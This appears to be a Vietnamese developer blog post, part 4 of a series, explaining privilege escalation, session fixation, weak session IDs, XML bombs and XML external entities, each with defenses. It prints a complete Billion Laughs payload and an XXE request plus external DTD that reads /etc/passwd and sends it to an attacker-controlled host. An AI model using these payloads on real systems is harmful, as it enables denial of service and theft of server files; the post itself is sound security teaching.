- vừa được xem lúc

Các kĩ thuật hack cơ bản lập trình viên nên biết - Phần 4

0 0 29

Người đăng: Nagi

Theo Viblo Asia

Part 1

Part 2

Part 3

Part 4

Privilege Escalation - Leo thang đặc quyền

Là bằng một cách nào đó mà Hacker chiếm được quyền hạn, của người dùng cấp cao hơn. Cái này khác một chút với việc chiếm tài khoản hay cookie của người dùng cấp cao hơn, thay vì sử dụng tài khoàn của người khác, hacker sẽ lợi dụng các kẽ hở, đẩy thông tin sai lệch để hệ thống nhầm lẫn rằng họ là người dùng cấp cao và cho phép thực hiện hành động.

sửa lại cookie thành người dùng cấp cao

thanh đổi thông tin form đển đẩy thông tin sai lệch

Phòng chống

1. Giữ thông tin nhạy cảm ở phía máy chủ

Điều này nghĩa là chỉ có session ID được đẩy qua lại giữa client và server, mọi thông tin liên quan đều được giữ ở server, hacker sẽ không thể giả mạo do không biết được có thông tin gì

2. Tamper-Proofing Cookies

Bạn có thể thêm chữ kí điện tử để tránh việc dữ liệu bị giả mạo

3. Mã hóa dữ liệu

https://viblo.asia/p/leo-thang-dac-quyen-trong-windows-windows-privilege-escalation-1-service-exploits-vyDZO7QOZwj

Session Fixation

Là kĩ thuật chiếm đoạt session của người dùng, bằng việc lợi dụng việc website không thay đổi session id mỗi khi đăng nhập mà sử dụng session trước đó, hacker có thể lừa người dùng đăng nhập bằng 1 session hợp lệ do hắn tạo ra, sau đó hacker chỉ cần dùng session đó là có thể truy cập vào tài khoản người dùng

Kịch bản như sau:

  • Hacker tìm thấy 1 trang web nhận session id từ reqest mà không xác thực, như là http://example.com
  • Hắn gửi cho nạn nhân một đường link dạng http://example.com?sessionId=abcd hoặc http://example.com/document.cookie=”sessionId=abcd”;
  • Nạn nhân truy cập link trên và đăng nhập
  • Sau đó hacker cũng truy cập link trên và dùng tài khoản của nạn nhân

Phòng chống

1. Không truyền Session ID trong biến GET/POST

Không chỉ giúp hacker có thể tạo link độc mà còn có thể làm lộ session id. Tốt hơn là dùng HTTP cookie ấy

2. Tạo lại session ID khi xác thực

Lúc đó thì cái session id hacker gửi cho bạn thành vô dụng ?

3. Chỉ chấp nhận session ID được tạo ở phía server

Nghe hay đấy, cũng tốt nữa, nhưng về cơ bản thì nó không có giải quyết được vấn đề này =))

4. Đặt Timeout và thay thế session ID cũ
5. Triển khai logout function đủ mạnh
6. Yêu cầu Session mới khi truy cập từ Referrers đáng ngờ

Weak session ids

Cái này dễ hiểu, là trường hợp session id có thể tính toán hoặc dễ đoán, như id người dùng, hoặc id người dùng + abc chả hạn =)))

Sau khi tìm ra quy tắc rồi thì hacker có thể ung dung ngồi sửa session để đăng nhập mà chả cần ngồi chờ brute force, hay tìm mấy lỗi lằng nhằng phụ thuộc vào nạn nhân như XSS

Phòng chống

1. Sử dụng công cụ quản lý session

Không chắc gọi là "công cụ" thì có chuẩn xác không, nhưng ý tôi là mấy cái framework bây giờ chắc đều hỗ trợ quản lý session cả rồi, cứ dùng thôi chứ cũng không cần cố sáng tạo, viết ra cái mới làm gì ?

2. Chống giả mạo cookie

Thêm chữ ký điện tử, giống cái Tamper-Proofing Cookies ở phần Leo thang đặc quyền phía trên ấy

XML Bombs

Một đoạn code XML nhỏ nhắn, xinh xắn, và tuân thủ luật pháp, nhưng khi chạy bằng trình biên dịch sẽ tạo ra dữ liệu lớn khủng khiếp đến mức treo luôn cả server, cũng là một dạng tấn công từ chối dịch vụ

VD như Billion laughs attack, source từ wikipedia

<?xml version="1.0"?>
<!DOCTYPE lolz [ <!ENTITY lol "lol"> <!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;"> <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;"> <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;"> <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;"> <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;"> <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;"> <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;"> <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>

Như các bạn thấy, lô in ra lol, lô2 in ra 10 lần lô, lô3 in ra 10 lần lô2.... => từ một đoạn code nhỏ xinh đã in ra 10^9 lol = 1.000.000.000 lol

Để các bạn dễ hình dung nó nhiều đến thế nào thì, một bộ tiên hiệp tàu 2000 chương cũng chỉ khoảng trên dưới 3.000.000 chữ

Tưởng tượng đó không chỉ là một chữ 'lol' mà là cả một bài viết như các bạn đang đọc chẳng hạn, sập là cái chắc =))

Phòng chống

1. Disable Parsing of Inline DTDs (document type definitions)
2. Consider Making XML Parsing Asynchronous
3. Throttle Uploads Per Client

XML External Entities

Vòng lại ví dụ phía trên môt chút, dòng !DOCTYPE được gọi tắt là DTD, trong ví dụ trên là inline DTD, ngoài ra còn có thêm một cái nữa là External DTD. Ngược lại với inline, là khái báo các entity trực tiếp trong file, External DTD là định nghĩa DTD ra một file riêng khác file XML được sử dụng.

Kiểu vậy (source w3school)

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE note SYSTEM "Note.dtd">
<note>
<to>Tove</to>
<from>Jani</from>
<heading>Reminder</heading>
<body>Don't forget me this weekend!</body>
</note>

Với file note.dtd dạng vậy

<!DOCTYPE note
[
<!ELEMENT note (to,from,heading,body)>
<!ELEMENT to (#PCDATA)>
<!ELEMENT from (#PCDATA)>
<!ELEMENT heading (#PCDATA)>
<!ELEMENT body (#PCDATA)>
]>

Lý thuyết vậy được rồi, giờ quay lại với vấn đề lỗ hổng bảo mật nay.

Về cơ bản, hacker sẽ lợi dụng việc gọi file dtd từ bên ngoài này, họ sẽ gủi một yêu cầu chứa dữ liệu XML (Content-Type: text/xml), phân khai báo đến DTD ngoài nằm trên server của hacker.

POST /login HTTP/1.1
Host: vulnerable
Connection: close
Content-Type: text/xml
Content-Length: 97 <?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "http://192.168.159.1:3000/test.dtd">
<foo>&e1;</foo>

File DTD kiểu vậy

<!ENTITY % p1 SYSTEM "file:///etc/passwd">
<!ENTITY % p2 "<!ENTITY e1 SYSTEM 'http://192.168.159.1:3001/BLAH?%p1;'>">
%p2;

Khi ứng dụng thực hiện phân tích dữ liệu XML với phần DTD như trên, trình phân tích XML sẽ đọc nội dung tệp /etc/passwd trong hệ thống và gán vào biến p1. Sau đó một biến p2 khác được tạo chứa liên kết đến server attacker và giá trị của p1 (là nội dung file /etc/passwd). Sau đó nó sẽ in giá trị của p2 thông qua khai báo %p2

Nguồn tham khảo :

Phòng chống

1. Disable Parsing of Inline DTDs
2. Limit the Permissions of Your Web Server Process

Bình luận

Bài viết tương tự

- vừa được xem lúc

Linux Hardening and System Auditing (P1)

. Ngày nay, các hệ thống Linux được sử dụng trong suốt quá trình tính toán, từ các hệ thống nhúng đến hầu như tất cả các siêu máy tính, đồng thời đảm bảo một vị trí quan trọng trong các hệ thống máy chủ trên toàn thế giới. Linux đem lại cho người dùng khả năng tùy biến cao, sự ổn định và độ tin cậy

0 0 32

- vừa được xem lúc

Các kĩ thuật hack cơ bản lập trình viên nên biết - Phần 1

Mở đầu. Anh em theo cái nghề dev này, có lẽ một nửa là do mê game, nửa còn lại là do các ảnh "hắc cơ" trên phim lừa gạt , còn một nhóm nhỏ yêu ngành yêu nghề tôi không nói.

0 0 59

- vừa được xem lúc

CRSF attack

Giới thiệu. CSRF là phương thức tấn công bằng cách hacker lấy quyền xác thực của một user để gửi request mà người dùng đó không mong muốn.

0 0 30

- vừa được xem lúc

Các nguyên tắc bảo mật cơ bản trên Amazon Web Services (P1)

Lời mở đầu. Từ lưu trữ dữ liệu, chia sẻ file, truy cập từ xa, đến sao lưu từ xa – điện toán đám mây là một nhân tố quan trọng trong CNTT hiện đại.

0 0 41

- vừa được xem lúc

What Is Session Fixation?

Session Fixation là một kỹ thuật tấn công web. Kẻ tấn công lừa người dùng sử dụng session ID đặc biệt.

0 0 33

- vừa được xem lúc

Tổng quan một số kỹ thuật khai thác lỗ hổng bảo mật Web (P1)

Trong thời đại công nghệ phát triển hiện nay, việc đảm bảo an ninh thông tin trên không gian mạng đang là vấn đề dành được nhiều sự quan tâm. Nguy cơ mất an toàn thông tin đang là mối đe dọa lớn và ngày càng gia tăng đối với an ninh quốc gia.

0 0 83